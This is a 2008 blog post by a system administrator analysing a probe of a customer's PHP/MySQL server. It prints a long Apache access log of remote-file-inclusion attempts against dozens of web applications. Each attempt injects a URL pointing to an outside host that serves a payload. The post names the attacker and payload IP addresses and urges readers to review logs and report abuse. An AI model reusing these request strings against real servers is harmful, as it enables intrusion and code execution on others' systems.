HomeDownloadsContact UsForumNewsfeedsSitemap
Welcome
Username:

Password:


Remember me

[ ]
[ ]
[ ]

Headlines

»News: Twitter attacker had proper credentials
Twitter attacker had proper credentials
»News: PhotoDNA scans images for child abuse
PhotoDNA scans images for child abuse
»News: Conficker data highlights infected networks
Conficker data highlights infected networks >> Advertisement << Can you answer the ERP ...

Date published: not known
Details

»Vuln: Linux Kernel 'drivers/scsi/gdth.c' Local Privilege Escalation Vulnerability
Linux Kernel 'drivers/scsi/gdth.c' Local Privilege Escalation Vulnerability
»Vuln: Linux Kernel 'hfc_usb.c' Local Privilege Escalation Vulnerability
Linux Kernel 'hfc_usb.c' Local Privilege Escalation Vulnerability
»Vuln: Joomla! 'com_photoblog' Component 'blog' Parameter SQL Injection Vulnerability
Joomla! 'com_photoblog' Component 'blog' Parameter SQL Injection Vulnerability

Date published: not known
Details

Website Hacking Brief
Ever wonder what sort of traces a hacker leaves behind when they are probing for vulnerabilities on your website? I though it would be entertaining to give you some details of a very recent probe of another website that I manage.

The website is an in-house system for a customer of mine that has it open to the Internet so they can access their web-based CRM software from outside the office. They're running a Triad-style (aka WAMP) setup of Apache, PHP and MySQL on a Windows server.

It looks to me like the hacker was running a script of some sort that was looking for known vulnerabilities in several web-based applications like Joomla, LiveAlbum, Focus, phpSiteBackup, PhpRealty, NuclearBB, and Smarty Cart. This would make the hacker either (a) lazy, or (b) a Script Kiddy who doesn't actually know what he's doing beyond running tools other folks have written and released on the Internet.


The raw logfile snippet is attached here for your education and amusement:

207.126.55.250 - - [12/Jan/2008:14:11:52 -0600] "GET /send_reminders.php?includedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 216
207.126.55.250 - - [12/Jan/2008:14:11:52 -0600] "GET /index.php?page=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:11:53 -0600] "GET /phplive/help.php?css_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 214
207.126.55.250 - - [12/Jan/2008:14:11:53 -0600] "GET /index.php?page=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /admin.php?cal_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 207
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /common_include/common.php?commonIncludePath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 223
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 265
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /SQuery/lib/armygame.php?libpath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 221
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /myevent/event.php?myevent_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 215
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /admin.php?DFORUM_PATH=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 207
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /kernel/loadkernel.php?installPath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 219
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 208
207.126.55.250 - - [12/Jan/2008:14:11:54 -0600] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 213
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 218
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 227
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /dotproject/includes/db_adodb.php?baseDir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 230
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /includes/db_adodb.php?baseDir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 219
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /db_adodb.php?baseDir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 210
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /webcalendar/tools/send_reminders.php?includedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 234
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /phplive/help.php?css_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 214
207.126.55.250 - - [12/Jan/2008:14:11:55 -0600] "GET /tools/send_reminders.php?includedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 222
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /components/com_simpleboard/image_upload.php?sbp=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 241
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 264
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /live/help.php?css_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 211
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 268
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 262
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 238
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /fishcart_v3/fc_functions/fc_example.php?docroot=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 237
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /admin/inc/change_action.php?format_menue=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 225
207.126.55.250 - - [12/Jan/2008:14:11:56 -0600] "GET /phpbb/sendmsg.php?phpbb_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 215
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 245
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /admin/includes/author_panel_header.php?level=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 236
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /eva/index.php3?aide=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 212
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 230
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /cal.func.php?dir_edge_lang=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 210
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 264
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /phphtml.php?htmlclass_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 209
207.126.55.250 - - [12/Jan/2008:14:11:57 -0600] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 219
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 275
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /phpof/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 232
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /environment.php?DIR_PREFIX=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 213
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /stphpapplication.php?STPHPLIB_DIR=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 218
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /senetman/html/index.php?page=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 221
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /Weblogicnet/es_desp.php?files_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 221
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /anyInventory/environment.php?DIR_PREFIX=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 226
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /menu.php?functions_file=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 206
207.126.55.250 - - [12/Jan/2008:14:11:58 -0600] "GET /lib/functions.php?DOC_ROOT=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 215
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /Focus_v2.2/modules/Discipline/CategoryBreakdownTime.php?staticpath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 265
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /Focus_v1.0/modules/Discipline/CategoryBreakdownTime.php?FocusPath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 264
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /modules/addons/plugin.php?doc_root=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 263
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /manager/admin/index.php?MGR=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 221
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /phprealty/manager/admin/index.php?MGR=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 231
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 236
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /smarty.php?xcart_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 208
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /xcart/smarty.php?xcart_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 214
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /shop/smarty.php?xcart_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 213
207.126.55.250 - - [12/Jan/2008:14:11:59 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 264
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 258
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 256
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /wbxml/WBXML/Decoder.php?base_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 221
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /phpbbplus//language/lang_german/lang_main_album.php?phpbb_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 249
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /joomla/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 250
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /show.php?file=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 206
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 278
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /news/newstopic_inc.php?indir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 220
207.126.55.250 - - [12/Jan/2008:14:12:00 -0600] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 225
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 237
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /lib/base.php?Ba eCfg[BaseDir]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 210
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 273
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /includes/archive/archive_topic.php?phpbb_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 232
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /interface/editors/-custom.php?bField[bf_data]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 227
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /aural.php?site_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 207
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 258
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /system/funcs/xkurl.php?PEARPATH=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 220
207.126.55.250 - - [12/Jan/2008:14:12:01 -0600] "GET /common.php?livealbum_dir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 208
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 247
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 248
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /_theme/breadcrumb.php?rootBase=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 219
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /urlinn_includes/config.php?dir_ws=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 224
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /plugins/BackUp/Archive.php?bkpwp_plugin_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 224
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /xarg_corner.php?xarg=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 213
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 302 272
207.126.55.250 - - [12/Jan/2008:14:12:02 -0600] "GET /inc/sige_init.php?SYS_PATH=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 215
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /shop/index.php?action=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 212
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /teatro/pub/pub08_comments.php?basePath=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 227
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /plugins/BackUp/Archive.php?bkpwp_plugin_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 224
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 256
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /includes/functions_mod_user.php?phpbb_root_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 229
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /admin/kfm/initialise.php?kfm_base_path=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 222
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 248
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /admin/index.php?loadadminpage=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 213
207.126.55.250 - - [12/Jan/2008:14:12:03 -0600] "GET /joomla/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 245
207.126.55.250 - - [12/Jan/2008:14:12:04 -0600] "GET /config.inc.php?path_escape=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 212
207.126.55.250 - - [12/Jan/2008:14:12:04 -0600] "GET /includes/tumbnail.php?config[root_ordner]=http://75.133.78.195/mambo/.web/a.gif?/ HTTP/1.1" 404 219
207.126.55.250 - - [12/Jan/2008:14:12:04 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:04 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:05 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:05 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:06 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:07 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:07 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:08 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:08 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:09 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:09 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:10 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:10 -0600] "GET / HTTP/1.1" 302 26
207.126.55.250 - - [12/Jan/2008:14:12:11 -0600] "GET / HTTP/1.1" 302 26


It looks to me like the tool that our Script Kiddie is using is trying to launch/inject an offsite tool from a server in an elementary school in Michigan (75.133.78.195 which resolves to tank.suttonsbay.k12.mi.us). The source of our attack (207.126.55.250) is a server managed by a hosting company - probably hacked into without their knowledge although it's possible an employee of theirs is up to unauthorized personal use of the Internet given the attack was around 2:00 in the afternoon Central time.

I used WhoIs at http://network-tools.com to determine who owned the computers with the IP addresses shown and notified them by email that their computers were involved in an attack on the server that I manage.

My system was in no way compromised by this attack and I could've easily ignored it and moved on with my day, but I strongly believe in being a good Net Citizen so I contacted the folks involved. I've done this before and know for a fact that it has resulted in action at the other end - at least one resulted in a dialup subscriber (the offender) losing their account with their ISP.

In a nutshell:
1. PAY ATTENTION to the computers you're responsible for. If you don't review logs once in a while you're leaving yourself vulnerable.
2. GET INVOLVED and don't be afraid to take the time to drop someone an email or call them to let them know something is wrong on their side. It's not a waste of time.


Posted by jps on Wednesday 16 January 2008 - 16:00:41email to someone printer friendly{PDF=create pdf of this news item^news.12}


Visit Our Partners

Ads by Google

Powered by
e107
PHP
MySQL


This site is managed by Shepherd Technology and powered by e107.